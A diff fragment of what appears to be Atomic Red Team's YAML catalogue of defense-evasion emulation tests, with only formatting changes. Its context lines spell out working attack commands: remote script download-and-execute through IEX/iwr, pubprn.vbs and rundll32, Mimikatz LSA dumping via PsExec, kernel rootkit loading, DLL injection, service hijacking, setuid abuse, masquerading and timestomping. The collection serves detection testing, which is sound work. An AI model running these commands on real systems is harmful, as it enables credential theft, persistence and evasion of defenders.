- windows input_arguments: @@ -34274,7 +34274,7 @@ defense-evasion: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -34285,7 +34285,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -34408,7 +34408,7 @@ defense-evasion: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed -' + ' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -34419,7 +34419,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -34454,7 +34454,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -34469,10 +34469,10 @@ defense-evasion: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) -' + ' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" @@ -34483,7 +34483,7 @@ defense-evasion: command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" -' + ' name: command_prompt elevation_required: false T1055.008: @@ -34618,7 +34618,7 @@ defense-evasion: description: 'Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload. -' + ' supported_platforms: - windows input_arguments: @@ -34630,7 +34630,7 @@ defense-evasion: command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}" -' + ' name: command_prompt T1542.004: technique: @@ -34853,7 +34853,7 @@ defense-evasion: description: 'Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn''t really execute either." will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -34870,10 +34870,10 @@ defense-evasion: - description: 'The CSharp source file must exist on disk at specified location (#{source_file}) -' + ' prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}" @@ -34883,7 +34883,7 @@ defense-evasion: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file} cleanup_command: 'del #{output_file} >nul 2>&1 -' + ' name: command_prompt - name: Regsvcs Uninstall Method Call Test auto_generated_guid: fd3c1c6a-02d2-4b72-82d9-71c527abb126 @@ -34906,10 +34906,10 @@ defense-evasion: - description: 'The CSharp source file must exist on disk at specified location (#{source_file}) -' + ' prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}" @@ -34998,7 +34998,7 @@ defense-evasion: description: 'Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. -' + ' supported_platforms: - windows input_arguments: @@ -35018,10 +35018,10 @@ defense-evasion: dependencies: - description: 'Regsvr32.sct must exist on disk at specified location (#{filename}) -' + ' prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct" -OutFile "#{filename}" @@ -35056,7 +35056,7 @@ defense-evasion: description: 'Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. -' + ' supported_platforms: - windows input_arguments: @@ -35077,10 +35077,10 @@ defense-evasion: - description: 'AllTheThingsx86.dll must exist on disk at specified location (#{dll_name}) -' + ' prereq_command: 'if (Test-Path #{dll_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" @@ -35088,14 +35088,14 @@ defense-evasion: command: 'IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}\#{regsvr32name} /s #{dll_name} ) -' + ' name: command_prompt - name: Regsvr32 Registering Non DLL auto_generated_guid: 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 description: 'Replicating observed Gozi maldoc behavior registering a dll with an altered extension -' + ' supported_platforms: - windows input_arguments: @@ -35115,13 +35115,13 @@ defense-evasion: dependencies: - description: 'Test requires a renamed dll file -' + ' prereq_command: 'if exist #{dll_file} ( exit 0 ) else ( exit 1 ) -' + ' get_prereq_command: 'copy "C:\Windows\System32\shell32.dll" "#{dll_file}" -' + ' executor: name: command_prompt elevation_required: false @@ -35237,7 +35237,7 @@ defense-evasion: %SystemRoot%\Temp\lsass.exe /B cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 -' + ' name: command_prompt - name: Masquerading as Linux crond process. auto_generated_guid: a315bfff-7a98-403b-b442-2ea1b255e556 @@ -35253,7 +35253,7 @@ defense-evasion: echo 'sleep 5' | /tmp/crond cleanup_command: 'rm /tmp/crond -' + ' name: sh - name: Masquerading - cscript.exe running as notepad.exe auto_generated_guid: 3a2a578b-0a01-46e4-92e3-62e2859b42f0 @@ -35269,7 +35269,7 @@ defense-evasion: cmd.exe /c %APPDATA%\notepad.exe /B cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1 -' + ' name: command_prompt - name: Masquerading - wscript.exe running as svchost.exe auto_generated_guid: 24136435-c91a-4ede-9da1-8b284a1c1a23 @@ -35285,7 +35285,7 @@ defense-evasion: cmd.exe /c %APPDATA%\svchost.exe /B cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1 -' + ' name: command_prompt - name: Masquerading - powershell.exe running as taskhostw.exe auto_generated_guid: ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa @@ -35301,7 +35301,7 @@ defense-evasion: cmd.exe /K %APPDATA%\taskhostw.exe cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1 -' + ' name: command_prompt - name: Masquerading - non-windows exe running as windows exe auto_generated_guid: bc15c13f-d121-4b1f-8c7d-28d95854d086 @@ -35324,10 +35324,10 @@ defense-evasion: dependencies: - description: 'Exe file to copy must exist on disk at specified location (#{inputfile}) -' + ' prereq_command: 'if (Test-Path #{inputfile}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/bin/T1036.003.exe" -OutFile "#{inputfile}" @@ -35338,14 +35338,14 @@ defense-evasion: Stop-Process -ID $myT1036_003 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore -' + ' name: powershell - name: Masquerading - windows exe running as different windows exe auto_generated_guid: c3d24a39-2bfe-4c6a-b064-90cd73896cb0 description: 'Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe -' + ' supported_platforms: - windows input_arguments: @@ -35364,7 +35364,7 @@ defense-evasion: Stop-Process -ID $myT1036_003 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore -' + ' name: powershell - name: Malicious process Masquerading as LSM.exe auto_generated_guid: 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f @@ -35646,7 +35646,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -35660,10 +35660,10 @@ defense-evasion: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) -' + ' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -35696,7 +35696,7 @@ defense-evasion: Write-Host "End of DCShadow" cleanup_command: 'Stop-Process -Name "mimikatz" -Force -ErrorAction Ignore -' + ' T1014: technique: id: attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b @@ -35774,7 +35774,7 @@ defense-evasion: auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553 description: 'Loadable Kernel Module based Rootkit -' + ' supported_platforms: - linux input_arguments: @@ -35799,10 +35799,10 @@ defense-evasion: dependencies: - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}) -' + ' prereq_command: 'if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{rootkit_source_path}/* #{temp_folder}/ @@ -35812,17 +35812,17 @@ defense-evasion: executor: command: 'sudo insmod #{rootkit_path} -' + ' cleanup_command: 'sudo rmmod #{rootkit_name} -' + ' name: sh elevation_required: true - name: Loadable Kernel Module based Rootkit auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f description: 'Loadable Kernel Module based Rootkit -' + ' supported_platforms: - linux input_arguments: @@ -35847,11 +35847,11 @@ defense-evasion: dependencies: - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}) -' + ' prereq_command: 'if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: "if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;\ncp #{rootkit_source_path}/* #{temp_folder}/\ncd #{temp_folder}; make \nsudo cp #{temp_folder}/#{rootkit_name}.ko @@ -35860,7 +35860,7 @@ defense-evasion: executor: command: 'sudo modprobe #{rootkit_name} -' + ' cleanup_command: | sudo modprobe -r #{rootkit_name} sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko @@ -35990,7 +35990,7 @@ defense-evasion: description: 'Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. -' + ' supported_platforms: - windows input_arguments: @@ -36001,7 +36001,7 @@ defense-evasion: executor: command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); -' + ' name: command_prompt - name: Rundll32 execute VBscript command auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb @@ -36019,7 +36019,7 @@ defense-evasion: executor: command: 'rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0) -' + ' name: command_prompt - name: Rundll32 advpack.dll Execution auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89 @@ -36038,17 +36038,17 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}" executor: command: 'rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, -' + ' name: command_prompt - name: Rundll32 ieadvpack.dll Execution auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9 @@ -36068,17 +36068,17 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}" executor: command: 'rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, -' + ' name: command_prompt - name: Rundll32 syssetup.dll Execution auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125 @@ -36097,10 +36097,10 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}" @@ -36108,7 +36108,7 @@ defense-evasion: command: 'rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute} -' + ' name: command_prompt - name: Rundll32 setupapi.dll Execution auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19 @@ -36127,10 +36127,10 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}" @@ -36138,7 +36138,7 @@ defense-evasion: command: 'rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execute} -' + ' name: command_prompt - name: Execution of HTA and VBS Files using Rundll32 and URL.dll auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3 @@ -36161,7 +36161,7 @@ defense-evasion: description: 'Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable. -' + ' supported_platforms: - windows input_arguments: @@ -36172,7 +36172,7 @@ defense-evasion: executor: command: 'rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch} -' + ' name: command_prompt T1134.005: technique: @@ -36571,7 +36571,7 @@ defense-evasion: description: 'Change Service registry ImagePath of a bengin service to a malicious file -' + ' supported_platforms: - windows input_arguments: @@ -36591,22 +36591,22 @@ defense-evasion: dependencies: - description: 'The service must exist (#{weak_service_name}) -' + ' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" -' + ' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" -' + ' cleanup_command: 'sc.exe delete #{weak_service_name} -' + ' name: command_prompt T1548.001: technique: @@ -36662,7 +36662,7 @@ defense-evasion: description: 'Make, change owner, and change file attributes on a C source code file -' + ' supported_platforms: - macos - linux @@ -36688,7 +36688,7 @@ defense-evasion: auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in Linux and macOS. -' + ' supported_platforms: - macos - linux @@ -36704,14 +36704,14 @@ defense-evasion: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} -' + ' name: sh elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. -' + ' supported_platforms: - macos - linux @@ -36727,7 +36727,7 @@ defense-evasion: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} -' + ' name: sh elevation_required: true - name: Make and modify capabilities of a binary @@ -36759,7 +36759,7 @@ defense-evasion: description: 'This test gives a file the capability to set UID without using flags. -' + ' supported_platforms: - linux input_arguments: @@ -36773,7 +36773,7 @@ defense-evasion: sudo setcap cap_setuid=ep #{file_to_setcap} cleanup_command: 'rm #{file_to_setcap} -' + ' name: sh elevation_required: true T1218: @@ -36832,7 +36832,7 @@ defense-evasion: description: 'Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. -' + ' supported_platforms: - windows input_arguments: @@ -36848,17 +36848,17 @@ defense-evasion: dependencies: - description: 'T1218.dll must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: command: 'mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload} -' + ' name: command_prompt elevation_required: true - name: SyncAppvPublishingServer - Execute arbitrary PowerShell code @@ -36866,7 +36866,7 @@ defense-evasion: description: 'Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10. -' + ' supported_platforms: - windows input_arguments: @@ -36877,14 +36877,14 @@ defense-evasion: executor: command: 'SyncAppvPublishingServer.exe "n; #{powershell_code}" -' + ' name: command_prompt - name: Register-CimProvider - Execute evil dll auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655 description: 'Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB -' + ' supported_platforms: - windows input_arguments: @@ -36896,17 +36896,17 @@ defense-evasion: dependencies: - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} -' + ' name: command_prompt - name: InfDefaultInstall.exe .inf Execution auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef @@ -36925,17 +36925,17 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}" executor: command: 'InfDefaultInstall.exe #{inf_to_execute} -' + ' name: command_prompt - name: ProtocolHandler.exe Downloaded a Suspicious File auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2 @@ -36943,7 +36943,7 @@ defense-evasion: Office. On successful execution you should see Microsoft Word launch a blank file. -' + ' supported_platforms: - windows input_arguments: @@ -36956,15 +36956,15 @@ defense-evasion: - description: 'Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided -' + ' prereq_command: 'if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1} -' + ' get_prereq_command: 'write-host "Install Microsoft Word or provide correct path." -' + ' executor: name: command_prompt elevation_required: false @@ -36976,7 +36976,7 @@ defense-evasion: description: 'Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe -' + ' supported_platforms: - windows input_arguments: @@ -36998,15 +36998,15 @@ defense-evasion: prereq_command: 'if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1} -' + ' get_prereq_command: 'write-host ".Net must be installed for this test to work correctly." -' + ' executor: command: '#{mwcpath}\#{mwcname} "#{xml_payload}" output.txt -' + ' name: powershell elevation_required: false - name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions @@ -37014,7 +37014,7 @@ defense-evasion: description: 'Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe -' + ' supported_platforms: - windows input_arguments: @@ -37043,7 +37043,7 @@ defense-evasion: get_prereq_command: 'write-host "you need to rename workflow complier before you run this test" -' + ' executor: command: "#{renamed_binary} #{xml_payload} output.txt\n" name: powershell @@ -37086,7 +37086,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path}' @@ -37153,14 +37153,14 @@ defense-evasion: executor: command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}" -' + ' name: command_prompt - name: manage-bde.wsf Signed Script Command Execution auto_generated_guid: 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a description: 'Executes the signed manage-bde.wsf script with options to execute an arbitrary command. -' + ' supported_platforms: - windows input_arguments: @@ -37174,7 +37174,7 @@ defense-evasion: cscript %windir%\System32\manage-bde.wsf cleanup_command: 'set comspec=%windir%\System32\cmd.exe -' + ' name: command_prompt T1027.002: technique: @@ -37250,10 +37250,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin -' + ' cleanup_command: 'rm /tmp/packed_bin -' + ' name: sh - name: Binary packed by UPX, with modified headers (linux) auto_generated_guid: f06197f8-ff46-48c2-a0c6-afc1b50665e1 @@ -37272,10 +37272,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin -' + ' cleanup_command: 'rm /tmp/packed_bin -' + ' name: sh - name: Binary simply packed by UPX auto_generated_guid: b16ef901-00bb-4dda-b4fc-a04db5067e20 @@ -37292,10 +37292,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin -' + ' cleanup_command: 'rm /tmp/packed_bin -' + ' name: sh - name: Binary packed by UPX, with modified headers auto_generated_guid: 4d46e16b-5765-4046-9f25-a600d3e65e4d @@ -37314,10 +37314,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin -' + ' cleanup_command: 'rm /tmp/packed_bin -' + ' name: sh T1036.006: technique: @@ -37371,7 +37371,7 @@ defense-evasion: auto_generated_guid: 89a7dd26-e510-4c9f-9b15-f3bae333360f description: 'Space After Filename -' + ' supported_platforms: - macos executor: @@ -37383,7 +37383,7 @@ defense-evasion: auto_generated_guid: b95ce2eb-a093-4cd8-938d-5258cef656ea description: 'Space after filename. -' + ' supported_platforms: - macos - linux @@ -37605,7 +37605,7 @@ defense-evasion: auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e description: 'Common Sudo enumeration methods. -' + ' supported_platforms: - macos - linux @@ -37619,7 +37619,7 @@ defense-evasion: This is dangerous to modify without using ''visudo'', do not do this on a production system. -' + ' supported_platforms: - macos - linux @@ -37634,7 +37634,7 @@ defense-evasion: description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using ''visudo'', do not do this on a production system. -' + ' supported_platforms: - macos - linux @@ -37744,7 +37744,7 @@ defense-evasion: | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization Environment detected"; fi; -' + ' - name: Detect Virtualization Environment (Windows) auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d description: 'Windows Management Instrumentation(WMI) objects contains system @@ -37754,7 +37754,7 @@ defense-evasion: This is meant to find the result of Not supported, which is the result if run in a virtual machine -' + ' supported_platforms: - windows executor: @@ -37771,7 +37771,7 @@ defense-evasion: the system. If it''s a virtual machine, one of the device manufacturer will be a Virtualization Software. -' + ' supported_platforms: - macos executor: @@ -37781,7 +37781,7 @@ defense-evasion: ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment detected''; fi; -' + ' - name: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) auto_generated_guid: 4a41089a-48e0-47aa-82cb-5b81a463bc78 description: "Windows Management Instrumentation(WMI) objects contain system @@ -38036,7 +38036,7 @@ defense-evasion: executor: command: 'start #{docx_file} -' + ' name: command_prompt T1055.003: technique: @@ -38279,7 +38279,7 @@ defense-evasion: auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810 description: 'Stomps on the access timestamp of a file -' + ' supported_platforms: - linux - macos @@ -38291,13 +38291,13 @@ defense-evasion: executor: command: 'touch -a -t 197001010000.00 #{target_filename} -' + ' name: sh - name: Set a file's modification timestamp auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52 description: 'Stomps on the modification timestamp of a file -' + ' supported_platforms: - linux - macos @@ -38309,7 +38309,7 @@ defense-evasion: executor: command: 'touch -m -t 197001010000.00 #{target_filename} -' + ' name: sh - name: Set a file's creation timestamp auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b @@ -38355,7 +38355,7 @@ defense-evasion: executor: command: 'touch -acmr #{reference_file_path} #{target_file_path} -' + ' name: sh - name: Windows - Modify file creation timestamp with PowerShell auto_generated_guid: b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c @@ -38378,10 +38378,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the creation time on -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38389,10 +38389,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}" } -' + ' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: Windows - Modify file last modified timestamp with PowerShell auto_generated_guid: f8f6634d-93e1-4238-8510-f8a90a20dcf2 @@ -38415,10 +38415,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the modified time on -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38426,10 +38426,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}" } -' + ' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: Windows - Modify file last access timestamp with PowerShell auto_generated_guid: da627f63-b9bd-4431-b6f8-c5b44d061a62 @@ -38452,10 +38452,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the last access time on -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38463,10 +38463,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}" } -' + ' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: Windows - Timestomp a File auto_generated_guid: d7512c33-3a75-4806-9893-69abc3ccdd43 @@ -38484,25 +38484,25 @@ defense-evasion: dependencies: - description: 'timestomp.ps1 must be present in #{file_path}. -' + ' prereq_command: 'if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1" -OutFile "#{file_path}\timestomp.ps1" -' + ' - description: 'kxwn.lock must be present in #{file_path}. -' + ' prereq_command: 'if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{file_path}\kxwn.lock -ItemType File -' + ' executor: command: | import-module #{file_path}\timestomp.ps1 @@ -39476,10 +39476,10 @@ defense-evasion: - description: 'Test requrires a file to take ownership of to be located at (#{file_folder_to_own}) -' + ' prereq_command: 'IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: | mkdir #{file_folder_to_own} echo T1222.001_takeown1 >> #{file_folder_to_own}\T1222.001_takeown1.txt @@ -39487,7 +39487,7 @@ defense-evasion: executor: command: 'takeown.exe /f #{file_folder_to_own} /r -' + ' name: command_prompt - name: cacls - Grant permission to specified user or group recursively auto_generated_guid: a8206bcc-f282-40a9-a389-05d9c0263485 @@ -39510,10 +39510,10 @@ defense-evasion: dependencies: - description: 'Test requrires a file to modify to be located at (#{file_or_folder}) -' + ' prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: | mkdir #{file_or_folder} echo T1222.001_cacls1 >> 